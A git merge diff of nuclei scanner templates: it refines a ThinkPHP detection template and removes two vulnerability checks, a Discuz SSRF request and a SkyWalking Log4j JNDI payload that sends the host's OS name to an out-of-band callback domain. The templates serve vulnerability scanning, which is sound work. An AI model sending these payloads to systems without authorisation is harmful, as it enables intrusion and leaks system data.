Merge branch 'thinkphp-detection' of https://github.com/pwnhxl/nuclei-templates into pr/6858

technologies/thinkphp-detect.yaml

@@ -1,4 +1,4 @@
-id: thinkphp-detection
+id: thinkphp-detect
 
 info:
   name: ThinkPHP - Detect
@@ -9,20 +9,27 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cvss-score: 0.0
     cwe-id: CWE-200
-  tags: thinkphp,tech
+  metadata:
+    verified: true
+    shodan-query: title:"ThinkPHP"
+    fofa-query: app="ThinkPHP"
+  tags: thinkphp,tech,detect
 
 requests:
   - method: GET
     path:
+      - "{{BaseURL}}"
       - "{{BaseURL}}/?s={{randstr}}&c={{randstr}}&a={{randstr}}&m={{randstr}}"
 
+    stop-at-first-match: true
     matchers-condition: or
     matchers:
       - type: word
         part: body
         words:
-          - '/Library/Think/Think.class.php'
+          - '/Library/Think/'
           - '{ Fast & Simple OOP PHP Framework } -- [ WE CAN DO IT JUST THINK ]'
+          - '/thinkphp/library/think/'
         condition: or
 
       - type: word

vulnerabilities/discuz-downremoteimg-ssrf.yaml

@@ -1,37 +0,0 @@
-id: discuz-downremoteimg-ssrf
-
-info:
-  name: Discuz DownRemoteImg - Server-Side Request Forgery
-  author: pwnhxl
-  severity: high
-  description: Discuz DownRemoteImg - Server-Side Request Forgery
-  reference:
-    - https://www.seebug.org/vuldb/ssvid-91879
-    - https://cloud.tencent.com/developer/article/1511949
-    - https://github.com/opensec-cn/kunpeng/blob/master/plugin/go/discuzSSRF.go
-  metadata:
-    verified: "true"
-    shodan-query: title:"Powered by Discuz"
-    hunter-query: web.body="Discuz! X3.1"
-  tags: discuz,ssrf,oast
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/forum.php?mod=ajax&action=downremoteimg&message=[img]http://{{interactsh-url}}/test?.jpg[/img]"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
-      - type: word
-        part: body
-        words:
-          - "ATTACHORIMAGE"
-
-      - type: status
-        status:
-          - 200

vulnerabilities/skywalking/skywalking-log4j-rce.yaml

@@ -1,61 +0,0 @@
-id: skywalking-log4j-rce
-
-info:
-  name: SkyWalking - Remote Code Execution (Apache Log4j)
-  author: pwnhxl
-  severity: critical
-  description: |
-    SkyWalking < 9.0.0 - Remote Code Execution.
-  reference:
-    - https://logging.apache.org/log4j/2.x/security.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
-    - https://skywalking.apache.org/docs/main/next/en/changes/changes-9.0.0
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10
-    cve-id: CVE-2021-44228
-    cwe-id: CWE-77
-  metadata:
-    fofa-query: title="SkyWalking"
-    shodan-query: http.favicon.hash:1929532064
-    verified: "true"
-  tags: cve,cve2021,jndi,log4j,rce,oast,skywalking,kev
-
-requests:
-  - raw:
-      - |
-        @timeout: 10s
-        POST /graphql HTTP/1.1
-        Host: {{Hostname}}
-        Accept: application/json, text/plain, */*
-        Content-Type: application/json
-
-        {"query":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","variables":{"duration":{"start":"2022-06-22 1015","end":"2022-06-22 1030","step":"MINUTE"}}}
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: interactsh_protocol  # Confirms the DNS Interaction
-        words:
-          - "dns"
-
-      - type: regex
-        part: interactsh_request
-        regex:
-          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
-
-      - type: word
-        part: body
-        words:
-          - '"Invalid Syntax"'
-
-    extractors:
-      - type: kval
-        kval:
-          - interactsh_ip # Print remote interaction IP in output
-
-      - type: regex
-        part: interactsh_request
-        group: 1
-        regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output